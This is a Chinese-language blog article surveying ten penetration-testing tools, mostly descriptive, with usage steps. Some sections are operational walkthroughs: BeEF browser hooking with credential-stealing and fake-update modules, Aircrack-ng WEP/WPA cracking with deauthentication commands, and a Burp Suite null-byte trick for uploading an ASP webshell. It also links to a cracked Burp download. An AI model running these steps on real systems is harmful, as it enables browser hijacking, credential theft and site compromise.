| 关键词: 192.168 http 244.132 模块 工具 端口 测试 漏洞 浏览器 |
渗透测试的目的不仅是找到安全系统的易受攻击元素,还要检查企业中安全策略的合规性,衡量任何安全问题的意识和范围,并查看可能性在真正的外部实体网络攻击事件中,网络可能会遇到什么灾难。实质上,渗透测试允许你发现可能没有考虑过的弱点区域。渗透测试者提供了一种全新的视角,帮助企业改进系统安全和采用更主动的方法。借助专业工具,渗透测试更加有效和高效,以下介绍10种最佳工具。 Network Mapper (NMAP)(推荐小伙伴使用谷歌浏览器访问,再使用谷歌翻译)下载地址:https://nmap.org/ 使用方法: 测试的IP为:163.177.151.110 Nmap的纯扫描 以下命令的语法如下: NMAP普通扫描增加输出冗长(非常详细) Nmap的自定义端口扫描 该工具可以创建一个全面的网络虚拟地图,并使用它来查明网络攻击者可以利用的所有主要弱点。NMAP对渗透测试过程的任何阶段都很有用。最重要的是,它是免费的。 Netsparker Security Scanner下载地址:https://www.netsparker.com/web-vulnerability-scanner/ 使用方法:
![]()
![]() ![]() ![]()
![]() ![]() ![]() 可用的功能将帮助你确定应该使用的预先打包的漏洞,并且还允许你自定义它们;还可以使用IP地址和远程端口号配置它们。此外,还可以使用IP地址和本地端口号配置有效负载。然后,你可以在启动预期目标的漏洞之前确定要部署的有效负载。 Metasploit还集成了一个名为Meterpreter的工具,它可以在漏洞发生时显示所有结果,这意味着你可以毫不费力地分析和解释结果,并更有效地制定策略。 BeEF下载地址:https://github.com/beefproject/beef 安装方式: git clone git://github.com/beefproject/beef.git cd beef bundle install ruby beef 使用方式: 修改配置文件/usr/share/beef-xss/config.yaml (1)改vi beef侦听端口: http: port:3000(比如改为80) (2)与Metaspolit关联: metasploit: enable: false(改为true) like:ssl: false(改为true) ![]() (3) 配置一下拓展下的metasploit配置文件 vim /usr/share/beef-xss/extensions/metasploit/config.yaml 下面的路径为本机metasploit的路径。 ![]() 然后开启metasploit的相关服务开启:# service postgresql start 在命令行下用msfconsole把控制台打开 接着加载beEF,所用命令为:“load msgrpc ServerHost=127.0.0.1 Pass=abc123” 或者直接用这个命令启动: msfconsole -x "load msgrpc ServerHost=127.0.0.1 Pass=abc123" 下面我们来启动beef cd /usr/share/beef-xss/ && ./beef -x 为了方便,写个启动脚本 接口控制面板可以通过http://192.168.1.104:3000/ui/panel来访问 默认username/passwd是 beef:beef ![]() 控制界面 默认hook js:http://192.168.1.104:3000/hook.js 默认hook页面: http://192.168.1.104:3000/demos/basic.html //访问即可被hook 好了,现在一切都已经准备好,让我们用php编写一个程序进行测试 vim /var/www/index.html 如果是内网,也可以利用欺骗劫持勾住目标浏览器,比如使用mitmf(要以管理员权限运行) 钩住目标浏览器后,我们可以利用社会工程来使用户接受扩展。(Social Engineering中的模块) 比如:可以发送叫做:HTML5 Rendering Enhancements的扩展给用户,它会通过 1337 端口打开 shell。 还可以配合metasploit进一步获取权限。如: 生成url之后,注入目标浏览器中,进而在msf中获取shell 再比如这个模块 我们我们可以看到每一个tab代表一个浏览器,它有5个tab-总结如下: ![]() commands-我们可以对一个浏览器执行模块。模块可以执行可以通过JavaScript来执行的任何命令。每一个模块有一个图标,表示为如下色彩: 一些实用模块: Redirect Browser:进行重定向 方法:右侧填写木马的路径,可以配合插件升级攻击 ![]() Social Engineering --> Fake Flash Update flash插件升级 ![]() ![]() Social Engineering --> Fake Notification Bar 功能类似插件升级 Social Engineering --> Clippy ![]()
![]() Social Engineering --> Pretty Theft 窃取登陆凭证 ![]() ![]() Misc --> Create Invisible Frame 注入一个隐藏的iframe框架 ![]() Metasploit实用姿势 使用Metasploit的Browser Autopwn功能生成一个浏览器攻击链接 use auxiliary/server/browser_autopwn show options set LHOST xxx set SRVHOST xxx set SRVPORT xxxx 使用"Create Invisible Iframe"模块加载autopwn页面 hook手机 由于手机打开网址持续的时间很短,关闭当前页面后BeEF的shell就会下线,因此我们可以使用BeEF API,用户上线后能够自动执行批量命令,结合Persistence模块能够极大提高shell存活时间。除了与windows系统相关的信息无法获取,其他操作均能成功执行,并且BeEF为手机劫持提供了专门的模块系列——Phonegap 以下是经测试可以在Android上使用的模块: BeEF工具最适合检查Web浏览器,因为它主要用于对抗web攻击。这就是为什么它最有利于移动的客户。此工具使用GitHub查找漏洞,此工具的最佳之处在于它探索了web边界和客户端系统之外的弱点。请记住,这是专门针对Web浏览器的,因为它会查看单个源上下文中的漏洞。它连接多个Web浏览器,允许你启动定向命令模块。 Wireshark下载地址:https://www.wireshark.org/download.html 使用方法: 1、打开wireshark 2.6.5,主界面如下: 2、选择菜单栏上Capture -> Option,勾选WLAN网卡(这里需要根据各自电脑网卡使用情况选择,简单的办法可以看使用的IP对应的网卡)。点击Start。启动抓包。 3、wireshark启动后,wireshark处于抓包状态中。 4、执行需要抓包的操作,如ping www.baidu.com。 5、操作完成后相关数据包就抓取到了。为避免其他无用的数据包影响分析,可以通过在过滤栏设置过滤条件进行数据包列表过滤,获取结果如下。说明:ip.addr == 119.75.217.26 and icmp 表示只显示ICPM协议且源主机IP或者目的主机IP为119.75.217.26的数据包。 5、wireshark抓包完成,就这么简单。关于wireshark过滤条件和如何查看数据包中的详细内容在后面介绍。 Wireshakr抓包界面说明:数据包列表区中不同的协议使用了不同的颜色区分。协议颜色标识定位在菜单栏View --> Coloring Rules。如下所示 ![]() 该工具提供的最大优势是分析结果的产生方式使用户轻松理解。渗透测试者可以使用此工具执行许多不同的操作,包括颜色编码,以便进行更深入的调查,并隔离最重要的单个数据包。在分析基于Web的应用上发布到表单的信息和数据所固有的安全风险时,此工具非常方便。 w3af下载地址:http://w3af.org/download 使用方法: 0x04 漏洞扫描配置 0x05 漏洞扫描 0x06 漏洞利用配置 使W3AF成为一个完整工具的原因是参数和变量可以快速保存到会话管理器文件中。这意味着它们可以快速重新配置并重新用于Web应用上的其他渗透测试,从而为你节省大量时间,因为你不必在每次需要时重新输入所有参数和变量。此外,测试结果以图形和文本格式显示,使其易于理解。 Acunetix Scanner下载地址:http://www.downza.cn/soft/286127.html 使用方法: 1、选择“Tools Explorer”下的“Web Scanner”,鼠标右键出现选项菜单,选择“ New scan”
它涵盖了超过4500个弱点。登录序列记录器易于使用;它会扫描受密码保护的区域。该工具包含AcuSensor技术,手动渗透工具和内置漏洞测试。它可以快速抓取数千个网页,也可以在本地或通过云解决方案运行。 John the Ripper下载地址:https://www.openwall.com/john/ 使用方法: 【命令列指令】 john [-命令列参数] [密码档名称] 【命令列參數】 参数:-single 案例1:john -single passwd 参数:-wordfile:[字典档档名] -stdin 说明:使用「字典档」破解模式解密,由字典档内读取单字来破解;或是可以加上-stdin参数,代表由键盘输入单字来破解。 案例2:john -wordfile:bigdict.dic passwd 参数:-rules 案例3:john -wordfile:bigdict.dic -rules passw 参数:-incremental[:模式名称](参数也可以简写成 -i[:模式名称]) 案例4:john -i:all passwd 参数:-external:[模组名称] 这是一个众所周知的工具,是一个非常优雅和简单的密码破解工具。此工具允许你确定数据库中的任何未知弱点,它通过从传统字典中找到的复杂和流行单词的单词列表中获取文本字符串样本,并使用与正在生成的密码相同的格式对其进行加密来实现此目的。简单而有效的John the Ripper是任何精心准备的渗透测试仪工具包中的一个强烈推荐的补充。 Aircrack mainly下载地址:http://aircrack-ng.org/ 使用方法: Ifconfigwlan0 up 挂载无线网卡 Airmon-ngstart wlan0 激活无线网卡为监听模式 Airodump-ngmon0抓包 Airodump-ng –ivs –w shujubao –c 6 wlan0 抓包并保存 --ivs 这里是设置过滤,只保存用于破解的ivs文件,可以不加这个参数的,信道是多少写多少,一般是6,这个可以在抓包的时候看到,这一步可能会抓到好几个路由器的报文,选择自己要的就是了。 Airplay-ng -3 –b 目标MAC –h 客户端MAC mon0 -3是指采用arprequesr注入***模式(后面会提到参数0) 等待一段时间,具体等多少,就是等1000个以上的数据包吧,保险可以多等一会 Aircrack-ng shujubao-01.ivs 进行破解了,这种模式好破,当然拿windows下面破利用GPU加速更快。 Wpa加密破解: 前面都一样抓包的时候使用如下命令: Airodump-ng -c 6 –w shujubao mon0 Aireplay-ng -0 10 –a 目标MAC –c 客户端MAC wlan0(参数与WEP有很大不同) -0采用deauth***模式,后面是***次数,一般1次有效就好了。 屏幕上出现了:WPA handshake说明抓到了握手包 Aircrack-ng –w dic shujubao-01.cap 这里面需要自己制作字典,建议在win下面破解,字典工具也多,自己做一个就好了。也可以扔到网站上破解,他们应该有超大的彩虹表吧,个人感觉对于复杂的wpa2密码,这种***方式不是很好用,运气不好,要破几个月也是有可能,当然我没有验证,懒。不过这种方法确实是万能的,限制条件不多。 Burp Suite Pen Tester下载地址:https://pan.baidu.com/s/1mJdRZqSr5A0W9aWEcs3ySg 密码: 293x (压缩包内已包含注册机Loader) 运行Burp site,点击Proxy标签,确认Options选项卡下,Proxy listeners的running运行正常(勾选状态为运行),如果端口打开失败,可能的原因是有程序占用了该端口,点击edit,在local listener port:输入框输入一个未占用的端口,点击update即可。我这里将端口改为了8082 ![]() 打开http://192.168.8.120/test/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg,进入上传页面,选择我们的asp木马,然后设置浏览器代理地址为127.0.0.1,端口为8082,点击开始上传,burp suite截获数据包,点击forward按钮,返回结果如图所示。 ![]() 到这里所用到的数据包已经成功捕获,切换到history选项卡,右键刚刚捕获的post数据包,选择send to repeater。 ![]() ![]() 更改filepath值”bookpic/”为”bookpic/shell.asp “(asp后有一空格),然后把filename的值”C:Documents andSettingsAdministratorDesktopunset.asp”改成”C:Documents andSettingsAdministratorDesktopunset.jpg”,Content-Length的值不用更改,程序会在提交请求的时候自动更新该值。 ![]() 然后切换到hex选项卡,找到上传路径”bookpic/shell.asp “所处位置,把20改成00,然后点击GO,成功上传aspshell到http://192.168.8.120/test/bookpic/shell.asp。 ![]() ![]() ![]() 此工具包含成功执行扫描活动和高级渗透测试的所有基本要素,使其成为检查基于Web应用的理想选择,因为它包含用于分析目标服务器和浏览器之间请求的工具。它通过在Java平台上使用Web渗透测试来实现。它可用于许多不同的操作系统,包括Windows,Linux和OS X. |
| 本文出处: https://www.toutiao.com/i6866968758238642701/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|